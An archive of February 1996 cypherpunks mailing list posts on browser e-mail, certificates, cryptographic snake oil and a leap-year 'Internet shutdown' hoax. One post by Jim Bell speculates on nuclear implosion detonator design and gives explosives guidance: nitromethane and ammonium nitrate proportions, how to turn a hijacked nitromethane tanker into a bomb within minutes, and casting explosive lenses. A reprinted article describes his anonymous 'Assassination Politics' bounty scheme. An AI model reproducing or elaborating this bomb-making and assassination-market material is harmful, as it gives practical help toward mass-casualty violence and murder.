My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 21 Feb 96 23:13:46 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Web Browsers and Anonymous Mail (Was: NSA net trolling)
In-Reply-To: <199602210740.CAA13722@thor.cs.umass.edu>
Message-ID: <312C161C.7E73@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


lmccarth@cs.umass.edu wrote:
> 
> Wayne Madsen wrote somewhere:
> > A knowledgeable government source claims that
> > the NSA has concluded agreements with [...] Netscape to
> > permit the introduction of the means to prevent the anonymity of
> > Internet electronic mail, [...]
> 
> I suspect this may actually mean that they're pushing Netscape to
> incorporate cryptographic authentication into browser email, which I think is
> a useful development. I'm not aware of any public remailers previously
> operated by Netscape Communications Corp. that have now shut down. ;)

  Actually I believe that the quote from Madsen is his overblowing and
misinterpretation of our agreement to sell the government fortezza enabled
products.  There is no agreement that I know of between us and the NSA
regarding anonymity or e-mail.  Since I'm the one doing the code, someone
had better tell me if there is...

> At any rate, it's an excuse for me to ask some questions:
> 
> (0) I'm not aware of any class library objects or methods in stand-alone Java
> for calling the local mail transport agent. Is there any class library
> support in Java+{Navigator, HotJava, Mosaic, NetCruiser, the AOL web tool,
> etc.} for applet calls to the local mail agent that's configured in the
> browser ?
> 
> I would prefer not to reimplement SMTP using the Socket class in my own
> applets. Ideally I'd like to have an applet that presents a form with some
> entry boxes and check boxes, quantizes and encrypts the input according to
> the check box settings, and spews the resulting byte streams to the MTA.

  We do not curently allow Java to get access to our mail subsystem.

> (1) As I recall, I used to be able to set (as an Option) the path and name of
> the local MTA (e.g. /usr/lib/sendmail) in an earlier version of Netscape.
> That seems to have disappeared in Navigator 2.0. Is there indeed no longer a
> way to set that ?
> 
> It occurs to me that we could have achieved partial integration of
> remailing into Navigator quite cheaply with that option.

  I believe that we have always spoken SMTP via direct connection to port 25
on your designated mail server.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 21 Feb 96 23:50:07 PST
To: Black Unicorn <bdavis@thepoint.net>
Subject: Re: Easy Nuclear Detonator
Message-ID: <m0tpV8K-00091iC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:00 PM 2/21/96 -0500, Black Unicorn wrote:
>On Mon, 19 Feb 1996, Brian Davis wrote:
>
>> On Mon, 19 Feb 1996, jim bell wrote:
>> 
>> > it just didn't occur to me that you'd object to this.  "Nettiquette" is new
>> > to me.
^^^^^^^^^^^^^^^^^^ > 
>>   ^^^^^^
>> 
>> No shit.
>
>So, it would seem, is nuclear weapons design.

I wrote this just a few hours ago.  Let's have a vote:  Who thinks I have 
some idea about the subject?


>> A hell of a lot easier, I'm sure!  Multiple krytrons and coaxial capacitors 
>> is WAY too complicated.
>
>I've often wondered why not one circuit and all in series. If you had
>enough juice to fire them all, the exploding wire forms a conductive
>plasma to maintain the circuit. That, as I understand it, is what makes
>them so effective. Is it just a power limitation, or would it be
>impossible to match up the resistances between the wires well enough to
>get the proper timing?

It's probably a partly practical consideration.  For a given (reasonable) 
size of wire, it's going to take a certain amount of current to explode it 
sufficiently rapidly, and that translates into an approximate voltage.  For 
argument's sake, assume that the voltage necessary is 5000 volts.  (I don't 
know what the "real" number is...)  Capacitors of 5000 volts are reasonably 
easily "doable."  However, if you try to hook all those wires together, and 
if you have a couple of dozen trigger locations, that works out to 125,000 
volts total, which is a rather impractically high voltage for "routine" use. 
(to say nothing of the ability to SWITCH such high voltages).   I suspect 
that "parts availability" drives nuclear detonators just as it does most 
more innocuous electronics. 'course, their budgets are a lot higher!

In addition (and this is probably at least as important a reason, if not 
more so),  if you put multiple wires in series, while the current through 
them is equal, the voltage across each one may vary.  Thus, the energy put 
into each wire will also vary, and those where the voltage is higher get 
more power, and get hotter, and higher resistance, and more voltage, and 
more power, etc.

In other words, it's an unstable equilibrium, and this would almost 
certainly lead to a situation where some some triggers happened 
substantially later than the others.  Putting them all in PARALLEL would 
avoid this, sorta, but that has its own problems.

>> That's right, the "lenses" would still be necessary. I'm not clear on what 
>> kind of "transformer" they use to efficiently couple the blast energy into 
>> the dense plutonium;  I would guess that it would be the shock-wave 
>> equivalent of an "anti-reflection coating," which might require a material 
>> with the geometric mean of the mechanical impedance between the detonating 
>> explosive and the plutonium. 
>
>Well, there is a spacer or air gap between the core and "hammer" but
>I've never read what the hammer is made of. This part could be
>simulated in one dimension, and an optimization function used to find
>the best density. 

A few weeks ago, I downloaded a GIF of the H-bomb, and it shows an element 
which it referred to as a "shock absorber" (at the appropriate location)and 
identified the material as graphite.  Graphite is very stiff; a high modulus 
of elasticity (Young's modulus).  But it isn't very dense.  I would imagine 
that the velocity of sound in graphite is about as high as you can get in a 
solid material.  I haven't done any math to determine how effective a match 
this would be, but maybe it doesn't really matter.

Oh, one more thing.  What the lay person (or even the person who THINKS he 
"knows it all", as opposed to US, who do.  <G>!) doesn't realize about bomb
design 
is that the "highest tech" bombs are not the largest, but are in fact the 
SMALLEST bombs.  Chances are good that a Hiroshima-sized bomb was just about 
the smallest that was technically do-able in the 1940's.   I would imagine 
that most of the work that has gone into bomb design in the last 30 years 
has been the technology to develop smaller (LESS explosive power) bombs,  
aside from making them physically small enough to fit in a launch bus.

I forgot about the beryllium.  Beryllium, I understand, is described as a 
"neutron reflector".   Now how GOOD a neutron reflector it is I don't know, 
but if you're trying to make a bomb with the smallest amount of material at 
the primary's core it would help a great deal to have a neutron reflector.  
Presumably, it would be used to coat the inside of the "hammer."  If 
beryllium were a "perfect" neutron reflector, you could use arbitrarily low 
amounts of plutonium or U-235 as the core (analogy:  If you were in a room 
with walls which were perfect mirrors, and "you" were invisible, you would 
see "forever" and the volume of space you were in would appear to be 
infinite), and you could make the core as small as you want.  (But it isn't, 
so the improvement effected by beryllium is limited.)

It might also help to make the "pit" hollow, but I don't know about that.  
This might assist in the mechanical impedance match, too.  If you could get 
the chemical implosion timed  "just right" you might be able to get away 
with using a really THIN layer of plutonium that crashes together at the 
core.  This might provide optimum densification because you would be able to 
accelerate the hollow plutonium sphere centrally at near-detonation-velocity 
speeds, which would result in very effective density increases.

There is also supposed to be a beam trigger in modern bombs.  It ionizes
helium to 
form alphas, which are fired at beryllium targets which releases neutrons at 
"just the right time" to start the compacted core going at just the right 
time.  (More on this if you're interested...)


(BTW, keep in mind as you read what I'm writing that I've never had a nuke-E 
course, never talked to a bomb maker or anyone who ever talked to one (and 
probably never talked to anyone who talked to a person who talked to a 
bomb-maker, etc), have had zero access to classified information of any type 
(including non-nuclear).   So take what I'm saying with a grain of sodium 
chloride.  

Actually, I'm not particularly interested in bomb design anyway, so I really 
don't know why I started this thread?!?  <G>


>Using high-density explosives (RDX/HMX based I would
>think) would provide a better 'impedance match'.

That's probably true, but it's still likely to be a very mismatched system.  
The density of plutonium is really high.  Now we know why computers were so 
important in the 1960's and 1970's to bomb design (and still are, I guess!): 
 Doing a quasi-3 dimensional simulation of the trigger is vastly cheaper 
than actually exploding a bomb, and you can get far more information from 
the simulation as well.  Probably the only reason they kept setting off real 
bombs was to ensure that their mathematics represented reality. (Well, also 
to test the reliability of "working" warheads...)

BTW, a few years ago I heard about a new explosive material, 
octanitrocubane.  If you are familiar with chemistry, you'll suspect from 
the name what it is:  A cube-shaped arrangement of eight carbon atoms, each 
connected to a nitro (NOT nitrate) group.  It has at least two things going 
for it:

1.  It is stoichiometric internal to the molecule.

2.  It has ENORMOUS ring strain, which translates into a dramatically 
greater detonation energy.    It is probably the current record-holder for 
carbon/nitrogen/hydrogen/oxygen explosives, by a long shot.

Its main disadvantage is predictable, if you know any organic chemistry:  It 
is an extremely difficult compound to synthesize, or at least to develop the 
synthesis for.  Thus, it is probably exceedingly expensive.  That means that 
for "ordinary" use, almost any common explosive is better.  This material is 
only going to be practical for the "highest-level" usages of explosives, and 
nuclear detonators are one of these.  Of course, since we're DISMANTLING 
bombs and not building them (at least as much as we used to!) then new 
technology to build bombs isn't  particularly useful.  I'm "sure" Los Alamos 
has probably simulated an octanitrocubane-triggered bomb, for curiosity's 
sake if nothing else.  


>Also, how do they keep the core at the exact center of the air gap?
>Thin wires or pins to hold it there? Or is the "gap" actually some
>Styrofoam-like low-density but rigid material?

The B-28 (?) H-bomb GIF identified this gap as being "vacuum," but we know 
there is no reason to have an actual vacuum there.  In fact, as I have read, 
plutonium "pits" get warm to the touch due to radioactive decay.  If it were 
REALLY put in a "vacuum" it would be so well insulated that it would get 
EXTREMELY hot before radiative cooling equilibrated the temperature.  Since 
air is 99.9% of the way to a perfect vacuum compared to a solid, air (in a 
foam) is plausible, like a harder version of styrofoam.  Plenty of such 
foams exist today.  And it's possible they augment and stabilize the 
position by embedding a few relatively thin carbon rods radially between the 
pit and the hammer.

>Interesting that in 'The Curve of Binding Energy' the author hinted at
>this as in "I can't be specific, but I can say this: if you drive a
>nail, do you put the hammer against the nail and push?" At that time,
>it (the air gap) was still classified. Now it's widely known.

After a while, things become obvious, don't they?

Even so, and even though my "mechanical engineering" background is weak, I 
find it hard to believe that modern technology can't provide some sort of 
"graded impedance" covering that acts like a broadband anti-reflection 
coating.  (the mechanical equivalent to the covering for the Stealth bomber 
and fighter plane.)   The main problem would have been simulating such a 
complex material on a computer, at least in the 1960's.  Something tells me 
they would have pursued this at least theoretically,  perhaps lacking 
anything else to do.

The real problem, it seems to me, is that to do this simulation would 
require a pressure-versus-density curve for plutonium up to nearly a million 
atmospheres.  This is, of course, hard to test, and that is one reason it 
would be useful to have deeper atomic physics background.  Perhaps 
physicists would have been able to estimate such a curve on theoretical grounds.


>In reading about this one gets the feeling that bomb design is as much
>art as science, and that if a reasonably sharp person had the
>opportunity to experiment, with real explosives but not necessarily
>real plutonium, they would get the hang of it after a while.

That's exactly what computer simulation is intended to avoid the need for.  
I'm sure instrumentation is a real headache for the testers.

>Alternatively, a Nuclear Bomb Construction Kit - a freeware program
>that helps you to accurately design and play with simulated bombs -
>would be a very interesting political experiment. Combine this with a
>searchable database of available information on the subject. There must
>be lots of publicly available information that, combined and made
>searchable, would be of considerable help to the prospective
>bomb-maker. That would make one hell of a thesis for someone, if
>nothing else.

But not for me.  I have no "nuke E" credentials, and don't enjoy 
programming, and I'm busily working on my "Assassination Politics" debate.  
(which, incidentally, will (I believe) force the dismantling of all nuclear 
weapons in the world, if you've followed the debate, as well as eliminating 
all wars and militaries and governments.  Tell me, who do you think will win?)


>> You're pretty sharp; the version I've read is that amines (substituted 
>> ammonia, but possibly ammonia as well) makes nitromethane 
>> supersonic-rifle-bullet sensitive, but just barely.  Haven't tried this, 
>> however.  I would imagine that a blasting cap would set off pure 
>> nitromethane with no amine contamination at all.
>
>Let's see: Nitromethane and sawdust gives you a medium-power explosive
>that requires a compound detonator. 

Why put it in sawdust?  The only reason I can think of is to keep it from 
flowing like a liquid.  Nitromethane is "oxygen-poor" to start out with.

>Nitromethane with ammonium nitrate
>gives you "a direct substitute for TNT" which can be set off with a
>blasting cap.

Easily.  And even better, ammonium nitrate is "oxygen rich" so tht you can 
get efficient use of the nitromethane.  A 2-1 mixture by weight (AN, 2,
nitromethane, 
1) is stoichiometric, as I recall.  They are not miscible in all 
proportions, however, so you'd have to settle for a finely-powdered slurry.

That's why I specified a HOMOGENOUS liquid as the tube-filler.  At least 
that way you know it's a consistent mix, as opposed to a slurry which would 
settle.


>) The liquid if sensitized can be detonated with a blasting
>cap but a compound detonator produces higher velocity. They claim that
>nitromethane won't detonate in its pure state,

I doubt this.  I'll test it, however, within the next year or so.

> but if sensitized is more powerful than TNT.

That wouldn't be surprising.  TNT is EXTRAORDINARILY 'oxygen-poor.'  It's 
about as far as you get from being an "efficient" explosive. 

>Nitromethane is used for racing fuel and other high-volume purposes,
>and must be transported in tanker-truck quantities. If someone wanted
>to make a very large conventional bomb quickly, such a truck is about
>as close as you get to a ready-made bomb. It could be ready within
>hours after the truck was hijacked.

Hours?  Aw, C'mon!  Minutes!  Maybe even 60 seconds.   The biggest 
impediment is figuring out how to open the tank, but even that could be 
avoided by drilling through the wall with a self-sealing "screw" assembly, 
one that would drain a bit of liquid into a detonator channel...    These 
tankers are probably usually made either of aluminum or stainless steel, and 
they could probably be pierced comparatively easily with a screw or a 
pointed  probe, or even a drill arranged to seal after the flukes had 
pierced. (Makita's are REALLY useful!) Drilling aluminum is easy; drilling 
stainless steel's normally a bitch because it work-hardens, but you're not 
looking for a pretty result so you'd just design with a nicely-sharpened 
carbide tip (a little work with a masonry bit and a sacrificial grinding 
wheel will work wonders) and be prepared for anything up to and including 
tool steel.  The hole would only have to be 1/8" or even smaller (or maybe 
not even necessary, triggering through the wall is certainly possible, too, 
but it would require more than a lowly cap.) and you can apply enormous 
forces to a short drill bit.

>
>If you had more time to kill, so to speak, mix it with a larger
>quantity of ammonium nitrate to get a lot more bang for your buck.

I don't think it would be worth it.  If the tanker was full, you'd merely be 
replacing one fair explosive with another, and it would take a lot of work 
to grind up the AN and mix it with the contents of the tank.   You'd be 
wasting time, risking the operation of an anti-highjacking alarm system,  
and risking detection and leaving evidence of intent.  Just highjacking the 
truck, later followed  by a huge explosion, would "leave 'em guessing" about 
what really happened.

I guess the world is fortunate I'm not into this sorta stuff, huh?!?


>> > I'm not sure what the
>> >minimum cross-sectional area is for a proper detonation.
>> 
>> That's a good question; I really don't know.  It ought to be rather low for 
>> a liquid explosive, but when the opportunity presents itself I'll do my own 
>> experiments.
>
>What would be the simplest way to compare relative arrival times
>between two tubes? Since the result of an explosion is a plasma,
>electrodes placed in the tube at the far end should become conductive
>as the wave reaches them. So a dual channel oscilloscope, with the
>sweep triggered as the cap is detonated, should be able to compare the
>propagation through two tubes detonated by the same cap.

Me, I'd do it digitally.  Set up a master 100 MHz clock, for 10 nsec time 
resolution, feed it to a master counter made up of modern 74ACXXX 
synchronous counters, then take the count chain and buffer it into a bus 
connected to a slew of edge-triggered latches, with appropriate amplifiers 
and  extra circuitry to guard against double-clocking.  You could connect up 
as many latches as you wanted, fed from various points in a triggered 
system.  ("fanout limited," but then again, multiple buffering is easy to 
do, as well.)   "All" the data could be taken in one shot, maybe.  Dozens or 
even hundreds of locations.

I'd test simultaneity after multiple long lenths of parallel fine tubing, 
variations in velocity with diameter, effect of curvature, everything.  One 
"bang" and I'm done.  It would be easy to measure the detonation velocities 
of the "lens" explosives as well, probably to well under 0.1% accuracy.  (I 
wonder if nitromethane could act as one of them?!? Would it dissolve or 
weaken a solid explosive?  Can a solid explosive with a "compatible" 
detonation velocity be found?)

I only have a fair background in optics, but since the principle of the 
lensing effect is general it should be easy to figure out what the shape of 
the lenses would be.  Casting the lenses is probably the technique I'd use, 
since surprisingly enough most nitrated organic explosives will melt long 
before they might be inclined to explode.  TNT, for instance, has long been 
poured as a liquid into artillery shells, melted in steam-jacketed kettles.

At least four molds would be necessary:  Pentagonal and hexagonal versions 
of the inner and outer explosive.

>> Again, that's a matter I'm unsure of.  Part of the reason I specifi
ed THIN 
>> tubing is so it "appears" to be linear, from a detonation-velocity point of 
>> view.  All of this should be easily measureable, however.  I'd probably 
also 
>> want to measure the relative velocity in two different-sized tubes, to find 
>> out if there is a significant difference that could be exploited or avoided.
>
>This would be fun to play with, and the kind of thing the government
>would not like to see written up. Measure the speed versus tube
>diameter and radius of curvature. If radius has a significant effect,
>things get complex.

True, but I suspect that the variation is going to be smaller than is 
significant, or at least it can be measured and compensated for.  Chances 
are that "military-grade" accuracies are straightforwardly possible.

BTW, feel free to keep and forward this note to anyone you feel would be 
interested in this information.  I'd appreciate getting confirmation or 
corrections, for curiosity's sake if nothing else.


Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Wed, 21 Feb 96 23:28:56 PST
To: "'Vladimir Z. Nuri'" <vznuri@netcom.com>
Subject: RE: "consent of the governed"
Message-ID: <01BB00B5.C41C7320@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Vladimir Z. Nuri

I was musing over this phrase, "a government rules by consent of the governed"   [.......]
does it mean, "majority of the governed?" how exactly is consent expressed?
.......................................................................................

.  How exactly is consent extractedH^H^H^H^H^H^ requested?

.  When exactly is consent identified? 

.  How exactly is government applied to the consentees? 
   (caning, jailing, fines, etc.)

.  How exactly do consentors change methodologies when they suddenly realize that they, too, can be subject to their own device?

.  Why should non-consenting citizens live with governing methods which in fact conflict with the pursuit of those three human virtues:  life, liberty, happiness?

Supposedly, government is devised for ruling the "unruly";  a matter for definition and (dis)agreement which can provide endless hours of amusement for authoritarians, especially in court.

I hear tell that many who are no longer amused are now learning the many uses of encryption.  Thus the list.  

(end of my comments)
    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 22 Feb 96 00:28:16 PST
To: dnowch2@teleport.com
Subject: Assassination Poltics 8:  Asahi article
Message-ID: <m0tpVwE-000905C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


"Assassination Politics" Part 8

The following article appeared in the Sunday, February 4, 1996 issue of 
Asahi Evening News, in an article written by columnist Paul Maxwell, page 6. 
He writes a regular column about the Internet for this newspaper.

"Networks:  Paul Maxwell"

"Dial Internet for murder"

'The first thing we do, let's kill all the lawyers."  (Shakespeare, Henry VI).

A startling and controversial idea has surfaced on the Internet 
recently--fear with me for a moment while I explain it.  It is based on two 
technological developments:  digital cash and encryption software.

Briefly, digital cash is a system for transferring funds from one person to 
another on the Net.  For this system to be as good as cash, the transactions 
must be capable of being conducted anonymously, just like in real life.  
(You go into the Seven-Eleven, buy a Cafe Latte, and nobody knows your name 
or your credit history.  The purchase is not recorded in a database of your 
consumer preferences.)

Several competing schemes for digital cash have been launched,  but the one 
that eventually gains universal acceptance will surely have this anonymity 
feature.

The second innovation is a kind of software called public-key encryption.  
It allows you to send a file or an email message that is "locked" in such a 
way that it can only be opened by the intended recipient.  The recipient, 
however, cannot open it until given a "key."  This "key" may then be used to 
encrypt a return message that can only be opened by the original sender.

Freelance visionary and tinkerer Jim Bell has been following both of these 
developments for the past few years.  Recently, he asked himself a couple of 
tough questions:  "How can we translate the freedom afforded by the Internet 
to ordinary life?"  How can we keep government from banning encryption, 
digital cash, and other systems that will improve our freedom?"

Suddenly, Bell had a revolutionary idea.  ("Revolutionary" is the word he 
uses, and it fits.)  You and me--the little guys, the ordinary working 
people of the world--could get together, all pitch in, and pay to have every 
rotten scoundrel in politics assassinated.  And we could do it legally.  
Sort of.

Bell imagined an organization that would award "a cash prize to somebody who 
correctly 'predicted' the death of one of a list of violators of rights, 
usually either government employees, officeholders, or appointees.  It could 
ask for anonymous contributions from the public, and individuals would be 
able to send those contributions using digital cash."


He explains that "using modern methods of public-key encryption and 
anonymous digital cash, it would be possible to make such awards in such a 
way so that nobody knows who is getting awarded the money,  only that the 
award is being given.  Even the organization itself would have no 
information that could help the authorities find the 
person responsible for the prediction, let alone the one who caused the death."


Are you following this?  Let's say that we, the public, decide we've finally 
had enough of [insert name of villain].  Ten dollars from me, ten from 
you--suddenly there's a million dollars in a fund.  The money will go to the 
first person who can "predict" the date, time, and circumstances of the 
villain's death.  Obviously, this information is only known in advance by 
the assassin.

He sends an anonymous, "locked" message.  He kills the villain.  He sends 
the "key" to the message.  He has, without ever revealing his identity,  
"correctly predicted" the murder.  The "key" that he has provided is then 
used to "lock the award money in a file that is then publicly posted on the 
Internet.  Only the person who originated the key may open the file and 
claim the digital cash.

In other words, public anger could finance cash awards for assassinations.  
The organization that collected the money and announced a list of possible 
targets would never know about a crime in advance, and would never know the 
identity or whereabouts of a criminal.  It would not technically be guilty of 
conspiracy or complicity.

Jim Bell has thought about this a lot, and feels that the idea is 
technically feasible, practical, even foolproof.  Suppose for 
a moment he's right?  What are the implications?

World leaders live with the threat of assassination every day of their 
lives.  But at the local level, this could really have 
an impact.  And the "target" list wouldn't necessarily to politicians--any 
offensive public  personality would be fair game.  Picture yourself a year 
from now, sitting around with friends.   Somebody says, "Remember when Juice 
Newton got whacked?"   And you say, "Yeah--best ten bucks I ever spent."

Satisfying as it might be to declare war on asinine pop singers, Bell has a 
more civic-minded suggestion:  Let's kill all the car thieves.  He reasons 
that a very small number of career criminals are responsible for nearly all 
car thefts.  If one million car owners in a given metropolitan area 
contributed just four dollars a year, it would create $10,000 a day in 
"prize money" for the "predictor" of any car thief's death.

"Assuming that amount is far more than enough to get a typical car thief's 
'friends' to 'off' him," he writes, "there is simply no way that a 
substantial car-theft subculture could possibly be maintained."

Jim as high hopes for his plan--he thinks it could eventually lead to the 
end of political tyranny.  But if you don't like this idea, he has others.  
In a recent email exchange, I asked what he was doing now.

"I recommend that you rent the movie, "The Day the Earth Stood Still.," he 
answered.  "I'm working on a similar project."

[end of article]









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 22 Feb 96 00:39:41 PST
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: "and two forms of ID"
In-Reply-To: <v02120d04ad51b2b33a96@[199.0.65.105]>
Message-ID: <Pine.SUN.3.91.960222002325.26468C-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 22 Feb 1996, Robert Hettinga wrote:

> >I'm sufficiently impressed with the arguments against name credentials
> >that Carl Ellison has made that I'm looking seriously into systems
> >that don't do any sort of conventional certificate binding at all...
> 
> ... and I bet, Wei Dai's contentions to the contrary, that they'll be
> *cheaper* to use than those which do certificate binding, all other things
> being equal.

You got my position completely backward on this.  I've always supported 
Carl's arguments in the past on this issue (for example see the tread 
"subjective names...").  You may be thinking of what I said about the 
cost of defeating traffic analysis.

The natural state of the Net seems to be a kind of semi-anonymity.  
Trying to push it in either direction (complete traceability or 
anonymity) is costly.

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 21 Feb 96 21:45:11 PST
To: perry@piermont.com
Subject: Re: "and two forms of ID"
Message-ID: <v02120d04ad51b2b33a96@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



>I'm sufficiently impressed with the arguments against name credentials
>that Carl Ellison has made that I'm looking seriously into systems
>that don't do any sort of conventional certificate binding at all...

... and I bet, Wei Dai's contentions to the contrary, that they'll be
*cheaper* to use than those which do certificate binding, all other things
being equal.

Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.cybrspc.mn.org (Roy M. Silvernail)
Date: Thu, 22 Feb 96 00:11:42 PST
To: ipgsales@cyberstation.net (IPG Sales)
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960221155719.3814N-100000@citrine.cyberstation.net>
Message-ID: <960222.004814.8i7.rnr.w165w@sendai.cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, ipgsales@cyberstation.net writes:

> Who said that we are expanding OTP's -

I believe you did, when you stated that your "OTP" (and I am only using
"OTP" in this case to point up your misusage of the term, and not to
claim that what you are doing is any such thing) is used to seed your
"RNG" (another misnomer).

> we are using them to drive RNG's
> please read my mail back and forth with Derek and Roy Silvernail,

Do remember that the majority of my mail has not been copied to the
list.

> I belive that both of then recognize that an extremely large key, 2
> to some large number, let us say for the time being 2 to 12288 bits
> can be derived from a OTP when generated-

Not a chance, slick.  A One-Time Pad is well defined within the art, and
your PRNG system is no such thing.  I will thank you to not postulate
what I may or may not recognize.
- -- 
Roy M. Silvernail --  roy@cybrspc.mn.org will do just fine, thanks.
          "Does that not fit in with your plans?"
                      -- Mr Wiggen, of Ironside and Malone (Monty Python)
          PGP public key available upon request (send yours)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSwTVhvikii9febJAQEtpgP+MqcESnrisA8tYT+GulGamEhMIa9gTKAn
Dc1ylyG4pgMRW+osZnnBJcWeZq8Yx7aTzteTmkNYmpXZP9liVaySSOVce36ORG4X
BnRO2OGLI3JD8ssgMbifxbZay/00bDdCuMthGnXA+xKAW27p9i9tHLrPIyJhdjZa
Jd3rHWCqwCc=
=Cx0p
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 22 Feb 96 00:56:25 PST
To: Wink Junior <cypherpunks@toad.com
Subject: Re: IPG hoax?
Message-ID: <2.2.32.19960222085605.008bff38@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:32 PM 2/21/96 -0800, Wink Junior wrote:

>I must admit that after the first day I've been wondering if this whole
>IPG thing isn't some kind of deep troll or early April Fool's joke.  

It is part of the "Trolling Cryptographers Protocol Internet Protocol".  The
"TCP/IP" is a secret government project to keep cryptographers busy by
posting trolls to various newsgroups where they hang out.  (Sometimes they
cross post to various groups using the same technique.  This is known as a
"Troll Bridge".)  It is a followup to the evil and ancient "Asyncronous
Protocols of the Elders of Zion. (Also known as IPv1.) The next upcoming
plot is when they Imminatize the Eschaton with the most evil plot of all...
IPv666!  (Thankfully it only works under Windows 95 so far.)
|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Wed, 21 Feb 96 23:00:23 PST
To: cypherpunks@toad.com
Subject: Internet shutdown Feb 29?
Message-ID: <2.2.32.19960222070058.0067c96c@204.248.40.2>
MIME-Version: 1.0
Content-Type: text/plain


This looks completely, totally, and insanely bogus, but I
need some kind of verification for this bizarre little
piece of mail that somehow ended up in my mailbox.

Anybody from MIT ever heard of "Kim Dereksen"?

dave "I'm busy laughing, can you call back?"

 *** Attention ***

 It's that time again!

 As many of you know, each leap year the Internet must be shut down for 24
 hours in order to allow us to clean it.  The cleaning process, which
 eliminates dead email and inactive ftp, www and gopher sites, allows for
 a better-working and faster Internet.

 This year, the cleaning process will take place from 12:01 a.m. GMT on
 Feb. 29 until 12:01 a.m. GMT on March 1.  During that 24-hour period,
 five powerful Internet-crawling robots situated around the world will
 search the Internet and delete any data that they find.

 In order to protect your valuable data from deletion we ask that you do
 the following:

 1.  Disconnect all terminals and local area networks from their Internet
 connections.

 2.  Shut down all Internet servers, or disconnect them from the Internet.

 3.  Disconnect all disks and hardrives from any connections to the
 Internet.

 4.  Refrain from connecting any computer to the Internet in any way.

 We understand the inconvenience that this may cause some Internet users,
 and we apologize.  However, we are certain that any inconveniences will
 be more than made up for by the increased speed and efficiency of the
 Internet, once it has been cleared of electronic flotsam and jetsam.

 We thank you for your cooperation.

 Kim Dereksen
 Interconnected Network Maintenance staff
 Main branch, Massachusetts Institute of Technology

 Sysops and others:  Since the last Internet cleaning, the number of
 Internet users has grown dramatically.  Please assist us in alerting the
 public of the upcoming Internet cleaning by posting this message where
 your users will be able to read it.  Please pass this message on to other
 sysops and Internet users as well.  Thank you.
-----
David E. Smith,  c/o Southeast Missouri State University
1000 Towers Circle South MS 1210 Cape Girardeau MO 63701
dsmith@midwest.net,  dave@nym.alias.net,  PGP 0x961D2B09
(573)339-3814    http://www.midwest.net/scribers/dsmith/
"Reality is only for those lacking in true imagination."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Thu, 22 Feb 96 00:06:27 PST
To: KarL MarX <karlmarx@illumini.demon.co.uk>
Subject: Re: A Challenge (perhaps!)
In-Reply-To: <2@illumini.demon.co.uk>
Message-ID: <Pine.3.89.9602220219.F25093-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 21 Feb 1996, KarL MarX wrote:

> The application is written in Visual Basic and I could probably get a copy
> of the compiled (well VB is actually interpreted, but that's neither here or
> there) .EXE file....

It would be much more useful to see the actual source code...
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Wed, 21 Feb 96 23:47:51 PST
To: dsmith@midwest.net (David E. Smith)
Subject: Re: Internet shutdown Feb 29?
In-Reply-To: <2.2.32.19960222070058.0067c96c@204.248.40.2>
